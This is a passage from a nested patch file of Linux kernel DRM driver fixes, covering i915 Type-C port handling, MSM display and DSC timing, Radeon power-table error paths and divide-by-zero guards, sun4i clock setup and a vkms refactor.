++		__intel_tc_port_put_link(dig_port);
+ 
+-	tc_cold_unblock(dig_port, domain, tc_cold_wref);
++		tc_cold_unblock(dig_port, dig_port->tc_lock_power_domain,
++				fetch_and_zero(&dig_port->tc_lock_wakeref));
++	}
+ 
+ 	drm_dbg_kms(&i915->drm, "Port %s: sanitize mode (%s)\n",
+ 		    dig_port->tc_port_name,
+@@ -846,14 +925,14 @@ void intel_tc_port_get_link(struct intel_digital_port *dig_port,
+ 			    int required_lanes)
+ {
+ 	__intel_tc_port_lock(dig_port, required_lanes);
+-	dig_port->tc_link_refcount++;
++	__intel_tc_port_get_link(dig_port);
+ 	intel_tc_port_unlock(dig_port);
+ }
+ 
+ void intel_tc_port_put_link(struct intel_digital_port *dig_port)
+ {
+ 	intel_tc_port_lock(dig_port);
+-	--dig_port->tc_link_refcount;
++	__intel_tc_port_put_link(dig_port);
+ 	intel_tc_port_unlock(dig_port);
+ 
+ 	/*
+@@ -923,4 +1002,6 @@ void intel_tc_port_init(struct intel_digital_port *dig_port, bool is_legacy)
+ 	dig_port->tc_mode = TC_PORT_DISCONNECTED;
+ 	dig_port->tc_link_refcount = 0;
+ 	tc_port_load_fia_params(i915, dig_port);
++
++	intel_tc_port_init_mode(dig_port);
+ }
+diff --git a/drivers/gpu/drm/i915/display/intel_tc.h b/drivers/gpu/drm/i915/display/intel_tc.h
+index 6b47b29f551c9..d54082e2d5e8d 100644
+--- a/drivers/gpu/drm/i915/display/intel_tc.h
++++ b/drivers/gpu/drm/i915/display/intel_tc.h
+@@ -24,7 +24,8 @@ int intel_tc_port_fia_max_lane_count(struct intel_digital_port *dig_port);
+ void intel_tc_port_set_fia_lane_count(struct intel_digital_port *dig_port,
+ 				      int required_lanes);
+ 
+-void intel_tc_port_sanitize(struct intel_digital_port *dig_port);
++void intel_tc_port_init_mode(struct intel_digital_port *dig_port);
++void intel_tc_port_sanitize_mode(struct intel_digital_port *dig_port);
+ void intel_tc_port_lock(struct intel_digital_port *dig_port);
+ void intel_tc_port_unlock(struct intel_digital_port *dig_port);
+ void intel_tc_port_flush_work(struct intel_digital_port *dig_port);
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_slpc.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_slpc.c
+index fdd895f73f9f1..72ba1c758ca79 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_slpc.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_slpc.c
+@@ -580,7 +580,7 @@ static int slpc_set_softlimits(struct intel_guc_slpc *slpc)
+ 		if (unlikely(ret))
+ 			return ret;
+ 		slpc_to_gt(slpc)->defaults.min_freq = slpc->min_freq_softlimit;
+-	} else if (slpc->min_freq_softlimit != slpc->min_freq) {
++	} else {
+ 		return intel_guc_slpc_set_min_freq(slpc,
+ 						   slpc->min_freq_softlimit);
+ 	}
+diff --git a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+index 24feae285ccd6..0829eaf2cd4e8 100644
+--- a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+@@ -1740,6 +1740,7 @@ struct msm_gpu *a5xx_gpu_init(struct drm_device *dev)
+ {
+ 	struct msm_drm_private *priv = dev->dev_private;
+ 	struct platform_device *pdev = priv->gpu_pdev;
++	struct adreno_platform_config *config = pdev->dev.platform_data;
+ 	struct a5xx_gpu *a5xx_gpu = NULL;
+ 	struct adreno_gpu *adreno_gpu;
+ 	struct msm_gpu *gpu;
+@@ -1766,7 +1767,7 @@ struct msm_gpu *a5xx_gpu_init(struct drm_device *dev)
+ 
+ 	nr_rings = 4;
+ 
+-	if (adreno_is_a510(adreno_gpu))
++	if (adreno_cmp_rev(ADRENO_REV(5, 1, 0, ANY_ID), config->rev))
+ 		nr_rings = 1;
+ 
+ 	ret = adreno_gpu_init(dev, pdev, adreno_gpu, &funcs, nr_rings);
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
+index c9d1c412628e9..6c0ffe8e4adbd 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
+@@ -1579,6 +1579,8 @@ static const struct drm_crtc_helper_funcs dpu_crtc_helper_funcs = {
+ struct drm_crtc *dpu_crtc_init(struct drm_device *dev, struct drm_plane *plane,
+ 				struct drm_plane *cursor)
+ {
++	struct msm_drm_private *priv = dev->dev_private;
++	struct dpu_kms *dpu_kms = to_dpu_kms(priv->kms);
+ 	struct drm_crtc *crtc = NULL;
+ 	struct dpu_crtc *dpu_crtc = NULL;
+ 	int i;
+@@ -1610,7 +1612,8 @@ struct drm_crtc *dpu_crtc_init(struct drm_device *dev, struct drm_plane *plane,
+ 
+ 	drm_crtc_helper_add(crtc, &dpu_crtc_helper_funcs);
+ 
+-	drm_crtc_enable_color_mgmt(crtc, 0, true, 0);
++	if (dpu_kms->catalog->dspp_count)
++		drm_crtc_enable_color_mgmt(crtc, 0, true, 0);
+ 
+ 	/* save user friendly CRTC name for later */
+ 	snprintf(dpu_crtc->name, DPU_CRTC_NAME_SIZE, "crtc%u", crtc->base.id);
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+index 32a3c42ec45b1..b2f330e99b0cd 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+@@ -79,9 +79,13 @@
+ 
+ #define INTF_SDM845_MASK (0)
+ 
+-#define INTF_SC7180_MASK BIT(DPU_INTF_INPUT_CTRL) | BIT(DPU_INTF_TE)
++#define INTF_SC7180_MASK \
++	(BIT(DPU_INTF_INPUT_CTRL) | \
++	 BIT(DPU_INTF_TE) | \
++	 BIT(DPU_INTF_STATUS_SUPPORTED) | \
++	 BIT(DPU_DATA_HCTL_EN))
+ 
+-#define INTF_SC7280_MASK INTF_SC7180_MASK | BIT(DPU_DATA_HCTL_EN)
++#define INTF_SC7280_MASK (INTF_SC7180_MASK)
+ 
+ #define IRQ_SDM845_MASK (BIT(MDP_SSPP_TOP0_INTR) | \
+ 			 BIT(MDP_SSPP_TOP0_INTR2) | \
+@@ -1199,7 +1203,7 @@ static struct dpu_pingpong_cfg qcm2290_pp[] = {
+ #define MERGE_3D_BLK(_name, _id, _base) \
+ 	{\
+ 	.name = _name, .id = _id, \
+-	.base = _base, .len = 0x100, \
++	.base = _base, .len = 0x8, \
+ 	.features = MERGE_3D_SM8150_MASK, \
+ 	.sblk = NULL \
+ 	}
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.h b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.h
+index 38aa38ab15685..77c46ce5a22f9 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.h
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.h
+@@ -203,17 +203,19 @@ enum {
+ 
+ /**
+  * INTF sub-blocks
+- * @DPU_INTF_INPUT_CTRL         Supports the setting of pp block from which
+- *                              pixel data arrives to this INTF
+- * @DPU_INTF_TE                 INTF block has TE configuration support
+- * @DPU_DATA_HCTL_EN            Allows data to be transferred at different rate
+-                                than video timing
++ * @DPU_INTF_INPUT_CTRL             Supports the setting of pp block from which
++ *                                  pixel data arrives to this INTF
++ * @DPU_INTF_TE                     INTF block has TE configuration support
++ * @DPU_DATA_HCTL_EN                Allows data to be transferred at different rate
++ *                                  than video timing
++ * @DPU_INTF_STATUS_SUPPORTED       INTF block has INTF_STATUS register
+  * @DPU_INTF_MAX
+  */
+ enum {
+ 	DPU_INTF_INPUT_CTRL = 0x1,
+ 	DPU_INTF_TE,
+ 	DPU_DATA_HCTL_EN,
++	DPU_INTF_STATUS_SUPPORTED,
+ 	DPU_INTF_MAX
+ };
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_ctl.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_ctl.c
+index a35ecb6676c88..696c32d30d10c 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_ctl.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_ctl.c
+@@ -550,7 +550,7 @@ static void dpu_hw_ctl_intf_cfg_v1(struct dpu_hw_ctl *ctx,
+ 		DPU_REG_WRITE(c, CTL_MERGE_3D_ACTIVE,
+ 			      BIT(cfg->merge_3d - MERGE_3D_0));
+ 	if (cfg->dsc) {
+-		DPU_REG_WRITE(&ctx->hw, CTL_FLUSH, DSC_IDX);
++		DPU_REG_WRITE(&ctx->hw, CTL_FLUSH, BIT(DSC_IDX));
+ 		DPU_REG_WRITE(c, CTL_DSC_ACTIVE, cfg->dsc);
+ 	}
+ }
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_dsc.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_dsc.c
+index 3662df698dae5..c8f14555834a8 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_dsc.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_dsc.c
+@@ -52,9 +52,10 @@ static void dpu_hw_dsc_config(struct dpu_hw_dsc *hw_dsc,
+ 	if (is_cmd_mode)
+ 		initial_lines += 1;
+ 
+-	slice_last_group_size = 3 - (dsc->slice_width % 3);
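++	/*
++	 * A DSC pixel group is 3 pixels; the register field holds one less
++	 * than the size of the last group in a slice, i.e.
++	 * ((slice_width % 3 ?: 3) - 1), which is what (slice_width + 2) % 3
++	 * computes (width 12 -> 2, 13 -> 0, 14 -> 1).
++	 */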
++	slice_last_group_size = (dsc->slice_width + 2) % 3;
++
+ 	data = (initial_lines << 20);
+-	data |= ((slice_last_group_size - 1) << 18);
++	data |= (slice_last_group_size << 18);
+ 	/* bpp is 6.4 format, 4 LSBs bits are for fractional part */
+ 	data |= (dsc->bits_per_pixel << 8);
+ 	data |= (dsc->block_pred_enable << 7);
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
+index b2a94b9a3e987..b9dddf576c029 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
+@@ -57,6 +57,7 @@
+ #define   INTF_PROG_FETCH_START         0x170
+ #define   INTF_PROG_ROT_START           0x174
+ #define   INTF_MUX                      0x25C
++#define   INTF_STATUS                   0x26C
+ 
+ #define INTF_CFG_ACTIVE_H_EN	BIT(29)
+ #define INTF_CFG_ACTIVE_V_EN	BIT(30)
+@@ -292,8 +293,13 @@ static void dpu_hw_intf_get_status(
+ 		struct intf_status *s)
+ {
+ 	struct dpu_hw_blk_reg_map *c = &intf->hw;
++	unsigned long cap = intf->cap->features;
++
++	if (cap & BIT(DPU_INTF_STATUS_SUPPORTED))
++		s->is_en = DPU_REG_READ(c, INTF_STATUS) & BIT(0);
++	else
++		s->is_en = DPU_REG_READ(c, INTF_TIMING_ENGINE_EN);
+ 
+-	s->is_en = DPU_REG_READ(c, INTF_TIMING_ENGINE_EN);
+ 	s->is_prog_fetch_en = !!(DPU_REG_READ(c, INTF_CONFIG) & BIT(31));
+ 	if (s->is_en) {
+ 		s->frame_count = DPU_REG_READ(c, INTF_FRAME_COUNT);
+diff --git a/drivers/gpu/drm/msm/dp/dp_display.c b/drivers/gpu/drm/msm/dp/dp_display.c
+index 57b82e5d0ab12..d16c12351adb6 100644
+--- a/drivers/gpu/drm/msm/dp/dp_display.c
++++ b/drivers/gpu/drm/msm/dp/dp_display.c
+@@ -1342,9 +1342,9 @@ static int dp_display_remove(struct platform_device *pdev)
+ {
+ 	struct dp_display_private *dp = dev_get_dp_display_private(&pdev->dev);
+ 
++	component_del(&pdev->dev, &dp_display_comp_ops);
+ 	dp_display_deinit_sub_modules(dp);
+ 
+-	component_del(&pdev->dev, &dp_display_comp_ops);
+ 	platform_set_drvdata(pdev, NULL);
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/msm/dsi/dsi_host.c b/drivers/gpu/drm/msm/dsi/dsi_host.c
+index f167a45f1fbdd..b433ccfe4d7da 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi_host.c
++++ b/drivers/gpu/drm/msm/dsi/dsi_host.c
+@@ -853,17 +853,17 @@ static void dsi_update_dsc_timing(struct msm_dsi_host *msm_host, bool is_cmd_mod
+ 	 */
+ 	slice_per_intf = DIV_ROUND_UP(hdisplay, dsc->slice_width);
+ 
+-	/* If slice_per_pkt is greater than slice_per_intf
+-	 * then default to 1. This can happen during partial
+-	 * update.
+-	 */
+-	if (slice_per_intf > dsc->slice_count)
+-		dsc->slice_count = 1;
+-
+ 	total_bytes_per_intf = dsc->slice_chunk_size * slice_per_intf;
+ 
+ 	eol_byte_num = total_bytes_per_intf % 3;
+-	pkt_per_line = slice_per_intf / dsc->slice_count;
++
++	/*
++	 * Typically, pkt_per_line = slice_per_intf / slice_per_pkt.
++	 *
++	 * Since the current driver only supports slice_per_pkt = 1,
++	 * pkt_per_line is equal to slice_per_intf for now.
++	 */
++	pkt_per_line = slice_per_intf;
+ 
+ 	if (is_cmd_mode) /* packet data type */
+ 		reg = DSI_COMMAND_COMPRESSION_MODE_CTRL_STREAM0_DATATYPE(MIPI_DSI_DCS_LONG_WRITE);
+@@ -987,7 +987,14 @@ static void dsi_timing_setup(struct msm_dsi_host *msm_host, bool is_bonded_dsi)
+ 		if (!msm_host->dsc)
+ 			wc = hdisplay * dsi_get_bpp(msm_host->format) / 8 + 1;
+ 		else
+-			wc = mode->hdisplay / 2 + 1;
++			/*
++			 * When DSC is enabled, WC = slice_chunk_size * slice_per_pkt + 1.
++			 * Currently, the driver only supports the default value of slice_per_pkt = 1
++			 *
++			 * TODO: Expand mipi_dsi_device struct to hold slice_per_pkt info
++			 *       and adjust DSC math to account for slice_per_pkt.
++			 */
++			wc = msm_host->dsc->slice_chunk_size + 1;
+ 
+ 		dsi_write(msm_host, REG_DSI_CMD_MDP_STREAM0_CTRL,
+ 			DSI_CMD_MDP_STREAM0_CTRL_WORD_COUNT(wc) |
+diff --git a/drivers/gpu/drm/msm/dsi/phy/dsi_phy_14nm.c b/drivers/gpu/drm/msm/dsi/phy/dsi_phy_14nm.c
+index 0f8f4ca464291..f0780c40b379a 100644
+--- a/drivers/gpu/drm/msm/dsi/phy/dsi_phy_14nm.c
++++ b/drivers/gpu/drm/msm/dsi/phy/dsi_phy_14nm.c
+@@ -539,6 +539,9 @@ static int dsi_pll_14nm_vco_prepare(struct clk_hw *hw)
+ 	if (unlikely(pll_14nm->phy->pll_on))
+ 		return 0;
+ 
++	if (dsi_pll_14nm_vco_recalc_rate(hw, VCO_REF_CLK_RATE) == 0)
++		dsi_pll_14nm_vco_set_rate(hw, pll_14nm->phy->cfg->min_pll_rate, VCO_REF_CLK_RATE);
++
+ 	dsi_phy_write(base + REG_DSI_14nm_PHY_PLL_VREF_CFG1, 0x10);
+ 	dsi_phy_write(cmn_base + REG_DSI_14nm_PHY_CMN_PLL_CNTRL, 1);
+ 
+diff --git a/drivers/gpu/drm/panel/panel-sharp-ls043t1le01.c b/drivers/gpu/drm/panel/panel-sharp-ls043t1le01.c
+index d1ec80a3e3c72..ef148504cf24a 100644
+--- a/drivers/gpu/drm/panel/panel-sharp-ls043t1le01.c
++++ b/drivers/gpu/drm/panel/panel-sharp-ls043t1le01.c
+@@ -192,15 +192,15 @@ static int sharp_nt_panel_enable(struct drm_panel *panel)
+ }
+ 
+ static const struct drm_display_mode default_mode = {
+-	.clock = 41118,
++	.clock = (540 + 48 + 32 + 80) * (960 + 3 + 10 + 15) * 60 / 1000,
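++	/* = 700 * 988 * 60 / 1000, i.e. htotal * vtotal * 60 Hz, in kHz */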
+ 	.hdisplay = 540,
+ 	.hsync_start = 540 + 48,
+-	.hsync_end = 540 + 48 + 80,
+-	.htotal = 540 + 48 + 80 + 32,
++	.hsync_end = 540 + 48 + 32,
++	.htotal = 540 + 48 + 32 + 80,
+ 	.vdisplay = 960,
+ 	.vsync_start = 960 + 3,
+-	.vsync_end = 960 + 3 + 15,
+-	.vtotal = 960 + 3 + 15 + 1,
++	.vsync_end = 960 + 3 + 10,
++	.vtotal = 960 + 3 + 10 + 15,
+ };
+ 
+ static int sharp_nt_panel_get_modes(struct drm_panel *panel,
+@@ -280,6 +280,7 @@ static int sharp_nt_panel_probe(struct mipi_dsi_device *dsi)
+ 	dsi->lanes = 2;
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+ 	dsi->mode_flags = MIPI_DSI_MODE_VIDEO |
++			MIPI_DSI_MODE_VIDEO_SYNC_PULSE |
+ 			MIPI_DSI_MODE_VIDEO_HSE |
+ 			MIPI_DSI_CLOCK_NON_CONTINUOUS |
+ 			MIPI_DSI_MODE_NO_EOT_PACKET;
+diff --git a/drivers/gpu/drm/panel/panel-simple.c b/drivers/gpu/drm/panel/panel-simple.c
+index 8a3b685c2fcc0..7ca00b0323362 100644
+--- a/drivers/gpu/drm/panel/panel-simple.c
++++ b/drivers/gpu/drm/panel/panel-simple.c
+@@ -759,8 +759,8 @@ static const struct panel_desc ampire_am_480272h3tmqw_t01h = {
+ 	.num_modes = 1,
+ 	.bpc = 8,
+ 	.size = {
+-		.width = 105,
+-		.height = 67,
++		.width = 99,
++		.height = 58,
+ 	},
+ 	.bus_format = MEDIA_BUS_FMT_RGB888_1X24,
+ };
+diff --git a/drivers/gpu/drm/radeon/ci_dpm.c b/drivers/gpu/drm/radeon/ci_dpm.c
+index 8ef25ab305ae7..b8f4dac68d850 100644
+--- a/drivers/gpu/drm/radeon/ci_dpm.c
++++ b/drivers/gpu/drm/radeon/ci_dpm.c
+@@ -5517,6 +5517,7 @@ static int ci_parse_power_table(struct radeon_device *rdev)
+ 	u8 frev, crev;
+ 	u8 *power_state_offset;
+ 	struct ci_ps *ps;
++	int ret;
+ 
+ 	if (!atom_parse_data_header(mode_info->atom_context, index, NULL,
+ 				   &frev, &crev, &data_offset))
+@@ -5546,11 +5547,15 @@ static int ci_parse_power_table(struct radeon_device *rdev)
+ 		non_clock_array_index = power_state->v2.nonClockInfoIndex;
+ 		non_clock_info = (struct _ATOM_PPLIB_NONCLOCK_INFO *)
+ 			&non_clock_info_array->nonClockInfo[non_clock_array_index];
+-		if (!rdev->pm.power_state[i].clock_info)
+-			return -EINVAL;
++		if (!rdev->pm.power_state[i].clock_info) {
++			ret = -EINVAL;
++			goto err_free_ps;
++		}
+ 		ps = kzalloc(sizeof(struct ci_ps), GFP_KERNEL);
+-		if (ps == NULL)
+-			return -ENOMEM;
++		if (ps == NULL) {
++			ret = -ENOMEM;
++			goto err_free_ps;
++		}
+ 		rdev->pm.dpm.ps[i].ps_priv = ps;
+ 		ci_parse_pplib_non_clock_info(rdev, &rdev->pm.dpm.ps[i],
+ 					      non_clock_info,
+@@ -5590,6 +5595,12 @@ static int ci_parse_power_table(struct radeon_device *rdev)
+ 	}
+ 
+ 	return 0;
++
++err_free_ps:
++	for (i = 0; i < rdev->pm.dpm.num_ps; i++)
++		kfree(rdev->pm.dpm.ps[i].ps_priv);
++	kfree(rdev->pm.dpm.ps);
++	return ret;
+ }
+ 
+ static int ci_get_vbios_boot_values(struct radeon_device *rdev,
+@@ -5678,25 +5689,26 @@ int ci_dpm_init(struct radeon_device *rdev)
+ 
+ 	ret = ci_get_vbios_boot_values(rdev, &pi->vbios_boot_state);
+ 	if (ret) {
+-		ci_dpm_fini(rdev);
++		kfree(rdev->pm.dpm.priv);
+ 		return ret;
+ 	}
+ 
+ 	ret = r600_get_platform_caps(rdev);
+ 	if (ret) {
+-		ci_dpm_fini(rdev);
++		kfree(rdev->pm.dpm.priv);
+ 		return ret;
+ 	}
+ 
+ 	ret = r600_parse_extended_power_table(rdev);
+ 	if (ret) {
+-		ci_dpm_fini(rdev);
++		kfree(rdev->pm.dpm.priv);
+ 		return ret;
+ 	}
+ 
+ 	ret = ci_parse_power_table(rdev);
+ 	if (ret) {
+-		ci_dpm_fini(rdev);
++		kfree(rdev->pm.dpm.priv);
++		r600_free_extended_power_table(rdev);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/radeon/cypress_dpm.c b/drivers/gpu/drm/radeon/cypress_dpm.c
+index fdddbbaecbb74..72a0768df00f7 100644
+--- a/drivers/gpu/drm/radeon/cypress_dpm.c
++++ b/drivers/gpu/drm/radeon/cypress_dpm.c
+@@ -557,8 +557,12 @@ static int cypress_populate_mclk_value(struct radeon_device *rdev,
+ 						     ASIC_INTERNAL_MEMORY_SS, vco_freq)) {
+ 			u32 reference_clock = rdev->clock.mpll.reference_freq;
+ 			u32 decoded_ref = rv740_get_decoded_reference_divider(dividers.ref_div);
+-			u32 clk_s = reference_clock * 5 / (decoded_ref * ss.rate);
+-			u32 clk_v = ss.percentage *
++			u32 clk_s, clk_v;
++
++			if (!decoded_ref)
++				return -EINVAL;
++			clk_s = reference_clock * 5 / (decoded_ref * ss.rate);
++			clk_v = ss.percentage *
+ 				(0x4000 * dividers.whole_fb_div + 0x800 * dividers.frac_fb_div) / (clk_s * 625);
+ 
+ 			mpll_ss1 &= ~CLKV_MASK;
+diff --git a/drivers/gpu/drm/radeon/ni_dpm.c b/drivers/gpu/drm/radeon/ni_dpm.c
+index 672d2239293e0..3e1c1a392fb7b 100644
+--- a/drivers/gpu/drm/radeon/ni_dpm.c
++++ b/drivers/gpu/drm/radeon/ni_dpm.c
+@@ -2241,8 +2241,12 @@ static int ni_populate_mclk_value(struct radeon_device *rdev,
+ 						     ASIC_INTERNAL_MEMORY_SS, vco_freq)) {
+ 			u32 reference_clock = rdev->clock.mpll.reference_freq;
+ 			u32 decoded_ref = rv740_get_decoded_reference_divider(dividers.ref_div);
+-			u32 clk_s = reference_clock * 5 / (decoded_ref * ss.rate);
+-			u32 clk_v = ss.percentage *
++			u32 clk_s, clk_v;
++
++			if (!decoded_ref)
++				return -EINVAL;
++			clk_s = reference_clock * 5 / (decoded_ref * ss.rate);
++			clk_v = ss.percentage *
+ 				(0x4000 * dividers.whole_fb_div + 0x800 * dividers.frac_fb_div) / (clk_s * 625);
+ 
+ 			mpll_ss1 &= ~CLKV_MASK;
+diff --git a/drivers/gpu/drm/radeon/rv740_dpm.c b/drivers/gpu/drm/radeon/rv740_dpm.c
+index d57a3e1df8d63..4464fd21a3029 100644
+--- a/drivers/gpu/drm/radeon/rv740_dpm.c
++++ b/drivers/gpu/drm/radeon/rv740_dpm.c
+@@ -249,8 +249,12 @@ int rv740_populate_mclk_value(struct radeon_device *rdev,
+ 						     ASIC_INTERNAL_MEMORY_SS, vco_freq)) {
+ 			u32 reference_clock = rdev->clock.mpll.reference_freq;
+ 			u32 decoded_ref = rv740_get_decoded_reference_divider(dividers.ref_div);
+-			u32 clk_s = reference_clock * 5 / (decoded_ref * ss.rate);
+-			u32 clk_v = 0x40000 * ss.percentage *
++			u32 clk_s, clk_v;
++
++			if (!decoded_ref)
++				return -EINVAL;
++			clk_s = reference_clock * 5 / (decoded_ref * ss.rate);
++			clk_v = 0x40000 * ss.percentage *
+ 				(dividers.whole_fb_div + (dividers.frac_fb_div / 8)) / (clk_s * 10000);
+ 
+ 			mpll_ss1 &= ~CLKV_MASK;
+diff --git a/drivers/gpu/drm/sun4i/sun4i_tcon.c b/drivers/gpu/drm/sun4i/sun4i_tcon.c
+index 523a6d7879210..936796851ffd3 100644
+--- a/drivers/gpu/drm/sun4i/sun4i_tcon.c
++++ b/drivers/gpu/drm/sun4i/sun4i_tcon.c
+@@ -778,21 +778,19 @@ static irqreturn_t sun4i_tcon_handler(int irq, void *private)
+ static int sun4i_tcon_init_clocks(struct device *dev,
+ 				  struct sun4i_tcon *tcon)
+ {
+-	tcon->clk = devm_clk_get(dev, "ahb");
++	tcon->clk = devm_clk_get_enabled(dev, "ahb");
+ 	if (IS_ERR(tcon->clk)) {
+ 		dev_err(dev, "Couldn't get the TCON bus clock\n");
+ 		return PTR_ERR(tcon->clk);
+ 	}
+-	clk_prepare_enable(tcon->clk);
+ 
+ 	if (tcon->quirks->has_channel_0) {
+-		tcon->sclk0 = devm_clk_get(dev, "tcon-ch0");
++		tcon->sclk0 = devm_clk_get_enabled(dev, "tcon-ch0");
+ 		if (IS_ERR(tcon->sclk0)) {
+ 			dev_err(dev, "Couldn't get the TCON channel 0 clock\n");
+ 			return PTR_ERR(tcon->sclk0);
+ 		}
+ 	}
+-	clk_prepare_enable(tcon->sclk0);
+ 
+ 	if (tcon->quirks->has_channel_1) {
+ 		tcon->sclk1 = devm_clk_get(dev, "tcon-ch1");
+@@ -805,12 +803,6 @@ static int sun4i_tcon_init_clocks(struct device *dev,
+ 	return 0;
+ }
+ 
+-static void sun4i_tcon_free_clocks(struct sun4i_tcon *tcon)
+-{
+-	clk_disable_unprepare(tcon->sclk0);
+-	clk_disable_unprepare(tcon->clk);
+-}
+-
+ static int sun4i_tcon_init_irq(struct device *dev,
+ 			       struct sun4i_tcon *tcon)
+ {
+@@ -1223,14 +1215,14 @@ static int sun4i_tcon_bind(struct device *dev, struct device *master,
+ 	ret = sun4i_tcon_init_regmap(dev, tcon);
+ 	if (ret) {
+ 		dev_err(dev, "Couldn't init our TCON regmap\n");
+-		goto err_free_clocks;
++		goto err_assert_reset;
+ 	}
+ 
+ 	if (tcon->quirks->has_channel_0) {
+ 		ret = sun4i_dclk_create(dev, tcon);
+ 		if (ret) {
+ 			dev_err(dev, "Couldn't create our TCON dot clock\n");
+-			goto err_free_clocks;
++			goto err_assert_reset;
+ 		}
+ 	}
+ 
+@@ -1293,8 +1285,6 @@ static int sun4i_tcon_bind(struct device *dev, struct device *master,
+ err_free_dotclock:
+ 	if (tcon->quirks->has_channel_0)
+ 		sun4i_dclk_free(tcon);
+-err_free_clocks:
+-	sun4i_tcon_free_clocks(tcon);
+ err_assert_reset:
+ 	reset_control_assert(tcon->lcd_rst);
+ 	return ret;
+@@ -1308,7 +1298,6 @@ static void sun4i_tcon_unbind(struct device *dev, struct device *master,
+ 	list_del(&tcon->list);
+ 	if (tcon->quirks->has_channel_0)
+ 		sun4i_dclk_free(tcon);
+-	sun4i_tcon_free_clocks(tcon);
+ }
+ 
+ static const struct component_ops sun4i_tcon_ops = {
+diff --git a/drivers/gpu/drm/vkms/vkms_composer.c b/drivers/gpu/drm/vkms/vkms_composer.c
+index 8e53fa80742b2..80164e79af006 100644
+--- a/drivers/gpu/drm/vkms/vkms_composer.c
++++ b/drivers/gpu/drm/vkms/vkms_composer.c
+@@ -99,7 +99,7 @@ static void blend(struct vkms_writeback_job *wb,
+ 			if (!check_y_limit(plane[i]->frame_info, y))
+ 				continue;
+ 
+-			plane[i]->plane_read(stage_buffer, plane[i]->frame_info, y);
++			vkms_compose_row(stage_buffer, plane[i], y);
+ 			pre_mul_alpha_blend(plane[i]->frame_info, stage_buffer,
+ 					    output_buffer);
+ 		}
+@@ -118,7 +118,7 @@ static int check_format_funcs(struct vkms_crtc_state *crtc_state,
+ 	u32 n_active_planes = crtc_state->num_active_planes;
+ 
+ 	for (size_t i = 0; i < n_active_planes; i++)
+-		if (!planes[i]->plane_read)
++		if (!planes[i]->pixel_read)
+ 			return -1;
+ 
+ 	if (active_wb && !active_wb->wb_write)
+diff --git a/drivers/gpu/drm/vkms/vkms_drv.h b/drivers/gpu/drm/vkms/vkms_drv.h
+index 0a67b8073f7e5..de4efc0a3bd01 100644
+--- a/drivers/gpu/drm/vkms/vkms_drv.h
++++ b/drivers/gpu/drm/vkms/vkms_drv.h
+@@ -56,8 +56,7 @@ struct vkms_writeback_job {
+ struct vkms_plane_state {
+ 	struct drm_shadow_plane_state base;
+ 	struct vkms_frame_info *frame_info;
+-	void (*plane_read)(struct line_buffer *buffer,
+-			   const struct vkms_frame_info *frame_info, int y);
++	void (*pixel_read)(u8 *src_buffer, struct pixel_argb_u16 *out_pixel);
+ };
+ 
+ struct vkms_plane {
+@@ -155,6 +154,7 @@ int vkms_verify_crc_source(struct drm_crtc *crtc, const char *source_name,
+ /* Composer Support */
+ void vkms_composer_worker(struct work_struct *work);
+ void vkms_set_composer(struct vkms_output *out, bool enabled);
++void vkms_compose_row(struct line_buffer *stage_buffer, struct vkms_plane_state *plane, int y);
+ 
+ /* Writeback */
+ int vkms_enable_writeback_connector(struct vkms_device *vkmsdev);
+diff --git a/drivers/gpu/drm/vkms/vkms_formats.c b/drivers/gpu/drm/vkms/vkms_formats.c
+index d4950688b3f17..b11342026485f 100644
+--- a/drivers/gpu/drm/vkms/vkms_formats.c
++++ b/drivers/gpu/drm/vkms/vkms_formats.c
+@@ -42,100 +42,75 @@ static void *get_packed_src_addr(const struct vkms_frame_info *frame_info, int y
+ 	return packed_pixels_addr(frame_info, x_src, y_src);
+ }
+ 
+-static void ARGB8888_to_argb_u16(struct line_buffer *stage_buffer,
+-				 const struct vkms_frame_info *frame_info, int y)
++static void ARGB8888_to_argb_u16(u8 *src_pixels, struct pixel_argb_u16 *out_pixel)
+ {
+-	struct pixel_argb_u16 *out_pixels = stage_buffer->pixels;
+-	u8 *src_pixels = get_packed_src_addr(frame_info, y);
+-	int x_limit = min_t(size_t, drm_rect_width(&frame_info->dst),
+-			    stage_buffer->n_pixels);
+-
+-	for (size_t x = 0; x < x_limit; x++, src_pixels += 4) {
+-		/*
+-		 * The 257 is the "conversion ratio". This number is obtained by the
